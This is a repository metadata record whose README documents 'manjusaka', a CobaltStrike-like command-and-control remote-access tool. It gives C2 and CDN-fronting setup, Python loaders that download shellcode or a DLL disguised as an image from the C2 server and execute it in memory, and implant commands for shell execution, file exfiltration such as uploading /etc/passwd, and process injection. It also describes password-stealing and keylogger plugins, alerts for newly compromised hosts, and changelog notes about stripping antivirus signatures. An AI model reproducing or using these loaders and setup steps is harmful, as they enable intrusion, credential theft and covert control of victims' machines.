{"id":13578993,"url":"https://github.com/YDHCUI/manjusaka","last_synced_at":"2025-04-05T20:32:55.073Z","repository":{"id":42109594,"uuid":"471286251","full_name":"YDHCUI/manjusaka","owner":"YDHCUI","description":"牛屎花 一款基于WEB界面的远程主机管理工具","archived":false,"fork":false,"pushed_at":"2023-05-09T03:31:53.000Z","size":177141,"stargazers_count":790,"open_issues_count":9,"forks_count":145,"subscribers_count":26,"default_branch":"main","last_synced_at":"2024-11-05T17:48:21.994Z","etag":null,"topics":["c2","cobaltstrike"],"latest_commit_sha":null,"homepage":"","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/YDHCUI.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2022-03-18T08:16:04.000Z","updated_at":"2024-11-01T09:23:10.000Z","dependencies_parsed_at":"2024-01-16T20:29:18.267Z","dependency_job_id":"e6dc12e5-0496-44a1-931d-ac7441b8d7c9","html_url":"https://github.com/YDHCUI/manjusaka","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YDHCUI%2Fmanjusaka","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YDHCUI%2Fmanjusaka/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YDHCUI%2Fmanjusaka/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/YDHCUI%2Fmanjusaka/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/YDHCUI","download_url":"https://codeload.github.com/YDHCUI/manjusaka/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":247399818,"owners_count":20932875,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["c2","cobaltstrike"],"created_at":"2024-08-01T15:01:35.658Z","updated_at":"2025-04-05T20:32:50.063Z","avatar_url":"https://github.com/YDHCUI.png","language":"Rust","funding_links":[],"categories":["Rust","其他_安全与渗透"],"sub_categories":["网络服务_其他"],"readme":"\n# 免责声明 \n本工具仅面向合法授权的企业安全建设行为,如您需要测试本工具的可用性,请自行搭建靶机环境。\n\n在使用本工具进行检测时,您应确保该行为符合当地的法律法规,并且已经取得了足够的授权。请勿对非授权目标进行扫描。\n\n此工具仅限于安全研究和教学,用户承担因使用此工具而导致的所有法律和相关责任! 作者不承担任何法律和相关责任!\n\n如您在使用本工具的过程中存在任何非法行为,您需自行承担相应后果,我们将不承担任何法律及连带责任。\n\n\n\n# manjusaka\n牛屎花 一款基于WEB界面的仿CobaltStrike C2远控 \n\n##系统架构: ![](https://github.com/YDHCUI/manjusaka/blob/main/images/0.jpg)\n\n## 使用方法\n配置conf.toml 运行主文件\n```bash\n[root@devops nps]# ./manjusaka\n[NPS] 2022/09/14 15:57:21 初始用户: manjusaka 密码: ZbFCa2L2LRd5\n[NPS] 2022/09/14 15:57:21 创建项目: 公共项目 没有归属的npc放在这个项目里面\n[NPS] 2022/09/14 15:57:21 监听项目路由: VHOS5vqN\n[NPS] 2022/09/14 15:57:21 NPS监听地址 :3200\n[NPS] 2022/09/14 15:57:21 NPU后台地址 : manjusaka\n[NPS] 2022/09/14 15:57:21 NPC监听地址 :801\n[NPS] 2022/09/14 15:57:21 NPC交互路由 : /:target/favicon.ico\n[NPS] 2022/09/14 15:57:21 NPC下载路由 : /:target/assert/:sys/bg.jpg\n[NPS] 2022/09/14 15:57:21 NPC文件路由 : /images/:fid/logo.png\n```\n则NPS访问地址为 http://192.168.93.217:3200/manjusaka \n账号密码见初始日志,每个人生成的密码及默认路由都不一样 如需修改 请自行编辑nps.db文件 \n\n\n1、创建项目,默认有一个公共项目,通过项目【状态】开关可以控制项目是否启用状态。选择当前项目后 可在回传结果里面查看当前项目回传的信息。\n\n新建项目 配置需要填写以下项:\n\n项目名称: 随便写 如 hvv2022\n\n回调地址: 外网IP和端口 http://12.34.56.78:8080\n\n上线域名: cdn域名 如 http://imagecdn2.alicdn.com 如果没有上cdn则填写和回调地址一样\n\nHost头 : cdn上线时所需要的host请求头 如 update.baiduimage.com 默认为上线域名\n\n代理地址: NPC上线时如果需要走代理,在这里配置。比如我测试用的clash,代理配置为http://192.168.93.1:7890 详见:https://docs.rs/reqwest/0.11.16/reqwest/struct.Proxy.html\n\n其它都会默认生成,点击确定更新之后需要刷新列表重新启用项目状态。\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/1.png)\n\n\n2、根据项目 生成npc 可以直接使用exe或elf格式的npc。也可以使用其它语言加载npc母体 比如使用python加载npc母体dll\n \n```python\nimport requests\nfrom ctypes import cdll\nres = requests.get(\"http://192.168.93.217:801/bq1iFEP2/assert/dll/x64/bg.jpg\")\nwith open(\"a.dll\",\"wb\") as f:\n f.write(res.content)\ncdll.LoadLibrary(\"a.dll\").main()\n\n```\n\n或者使用shellcode内存加载的形式\n```python\nimport requests\nimport ctypes\nshellcode = requests.get(\"http://192.168.93.217:801/bq1iFEP2/assert/bin/x64/bg.jpg\").content\nrwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)\nctypes.windll.kernel32.RtlMoveMemory(rwxpage, shellcode, len(shellcode))\nhandle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)\nctypes.windll.kernel32.WaitForSingleObject(handle, -1)\n\n```\n\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/2.png)\n\n3、npc上线,点选中该npc即可对其进行操作, 输入help可查看帮助。目前支持的操作命令如下:\n```\nhelp 打印帮助 \nps 查看进程 eg: ps\nss 查看网络连接 eg: ss\nls 枚举文件 eg: ls /\ncd 切换目录 eg: cd / \nsh 执行系统命令 eg: sh ps -aux , sh tasklist \ncat 读取文本 cat a.txt\nscreen 执行截屏 screen\nwget 下载文件 eg: wget http://192.168.1.1/a.txt \u003ca.txt\u003e 文件名可选 默认当前 \nput 上传文件 eg: put /etc/passwd 将passwd文件上传到nps服务器 \nstart 执行插件可执行文件 eg: start name \u003cargs\u003e 需要可执行文件在plugins目录下 会自动把插件传到目标机器上面\npl 执行插件 eg: pl plugname \u003cplugargs\u003e 需要插件在plugins目录下 \ninject 注入进程 eg: inject pid \u003cshellcodeurl\u003e shellcodeurl可选 默认下载当前shellcode下载链接 \n\n\n```\n\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/3.png)\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/4.png)\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/5.png)\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/6.png)\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/7.png)\n\n![](https://github.com/YDHCUI/manjusaka/blob/main/images/8.png)\n\n\n4、插件系统 分为第三方程序的调用和内置插件\n\n插件可在conf中配置默认启动参数,示例中有一个getpass插件 默认参数为all\n```\n[plug.getpass]\nargs = \"all\"\n\n```\n\n第三方程序的调用 比如现在我想将doglite作为插件启动 \n\n则需要将doglite命名为plug_doglite_nps.exe放入plugins文件夹并在conf中配置参数如下\n```\n[plug.doglite]\nargs = \"-service xx.xx.xx.xx:xx -action socks5 -local :40004 -r\"\n\n``` \n在信息页点选该插件运行,或在命令行输入 start doglite 即可启动该插件。\n\n内置插件,生成dll/so插件, 以plug_name_nps.dll格式命名放到plugins文件夹下面 在命令行输入 pl getpass 即可动态调用\n\n插件开发示例, plugmain传入插件运行参数 传出返回的内容值 \n```rust\n//./Cargo.toml\n\n[lib]\npath = \"src/lib.rs\"\ncrate-type = [\"cdylib\"]\n\n\n//src/lib.rs\n\nuse std::ffi::CStr;\nuse std::ffi::CString;\nuse std::os::raw::c_char;\n\nuse protobuf::Message;\nuse protobuf::RepeatedField;\n\n#[no_mangle]\npub unsafe extern \"C\" fn plugmain(args: *const c_char) -\u003e *const c_char { \n let args = CStr::from_ptr(args).to_str().unwrap();\n\n let mut prs = Vec::\u003cplug::PassResult\u003e::new();\n prs.push(plug::PassResult::new());\n \n let mut gret = plug::PlugResult{\n name: \"test\".to_string(),\n args: args.to_string(),\n resulttype: plug::ResultType::PASSRET,\n ..Default::default()\n };\n gret.set_passresult(RepeatedField::from_vec(prs));\n\n let c_str = gret.write_to_bytes().expect(\"protobuf to bytes err\");\n\n\n CString::new(c_str).expect(\"CString failed\").into_raw()\n}\n\n\n```\n返回值匹配到如下protobuf格式后后将结果写入数据库\n\n```protobuf\n\nsyntax = \"proto3\";\n\n\nenum ResultType {\n PASSRET = 0;\n PORTRET = 1;\n HTTPRET = 2;\n}\n\nmessage PassResult {\n string username = 1;\n string password = 2;\n string passtype = 3;\n string passfrom = 4;\n}\n\nmessage PortResult {\n string host = 1;\n int32 port = 2;\n string proto = 3;\n string version = 4;\n}\n\nmessage HttpResult {\n string proto = 1;\n string host = 2;\n int32 port = 3;\n string title = 4;\n string note = 5;\n}\n\nmessage PlugResult {\n string name = 1;\n string args = 2;\n ResultType resulttype = 3;\n repeated PassResult passresult = 11;\n repeated PortResult portresult = 12;\n repeated HttpResult httpresult = 13;\n}\n\n```\n\n5、 上线提醒功能,需要在conf里面配置一下webhook。\n\n```\n[webhook] \nmethod = \"POST\" \nurl = \"https://wxpusher.zjiecode.com/api/send/message\"\nheaders = \"Content-Type:application/json\" #多个header以\\n分割\nbody = \"\"\"{\n \"appToken\":\"AT_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\",\n \"content\":\"{Projname} {Projroute} \\\\n{Username} {Hostname} \\\\n{Intranet} {Internet} \\\\n{Pid} {Process}\",\n \"summary\":\"您有新的肉鸡上线啦!{Username} {Hostname}\",\n \"contentType\":3,\n \"uids\":[\"UID_xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx\"]}\"\"\"\n\n\n```\n\ndemo里用的是wxpusher的方案,可以自己改 但是目前只支持POST模式。\n\nbody里面的模板支持以下变量(注意:变量为未经过滤的原始字符,可能存在xss风险。)\n```\n{Id}\n{Target}\n{Intranet}\n{Username}\n{Hostname}\n{Platform}\n{Process}\n{Pid}\n{Systype}\n{Internet}\n{Note}\n{Projname}\n{Projroute}\n```\n\n\n## 更新\n\n### v0.9\n\n2、去除了npc获取公网地址项。。。(容易报毒)。\n\n3、支持socks5代理上线,修改加密算法为aes。 修改npu推送间隔为60s。 \n\n4、修复npc列表界面位移,支持备注功能。 \n\n5、去除了没啥卵用的功能,修复其它bug。\n\n\n### v0.8 \n1、获取真实公网地址、并展示IP归属 , 密码加密,上线提醒功能 \n\n2、支持cdn上线,加入代理上线功能 修复host头问题\n\n3、默认获取所有历史npc上线列表\n\n4、修复其它bug\n \n\n### v0.7\n1、新增shellcode加载方式,新增系统位数区分\n\n2、去除nps db的agents表, 使用内存记录npc列表 将进程名称改为进程全路径\n\n3、优化npu推送模式, 修复大量npc时的npu卡顿问题 \n\n4、新增进程注入命令 简单实现 CopySelf\n\n5、配置文件加密,配置分阶段加载。\n\n6、去除了没啥用的功能\n\n\n### v0.6\n1、插件支持可执行文件\n\n2、修复文件上传跨域bug\n\n3、登录验证码,cookie时效机制\n\n4、修复sh 执行命令不能加参数的bug \n\n5、优化npc体积 \n\n6、更新kzta 系统密码读取插件,更新qvte键盘记录插件 \n\n\n### v0.5\n1、修复安全漏洞\n\n2、开放NPC配置修改功能\n\n3、上传文件流程优化\n\n4、增加动态插件功能,可拓展更多功能 \n\n5、去除特征、修复bug \n\n\n### v0.4\n1、随机key \n\n2、去除特征、修复bug \n\n### v0.3\n1、实现截屏、密码获取功能。(仅window) \n\n2、修复cmd界面不能黏贴的bug。 \n\n3、修复项目不能暂停的bug。 \n\n4、自动创建data文件夹。 \n\n\n### v0.2\n1、修改网络协议使流量加密。\n\n2、加入本地文件上传下载功能。\n\n3、修复shell界面位移bug。\n\n### v0.1\n1、实现基础远控功能。\n\n\n## 交流\nhttps://discord.gg/YMqeN5Qyk4\n\n![f00026c92f3353c468ed6e97276f52f](https://user-images.githubusercontent.com/46884495/230539421-366acb18-77db-48b7-8ffd-982f59d3ea6f.jpg)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FYDHCUI%2Fmanjusaka","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FYDHCUI%2Fmanjusaka","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FYDHCUI%2Fmanjusaka/lists"}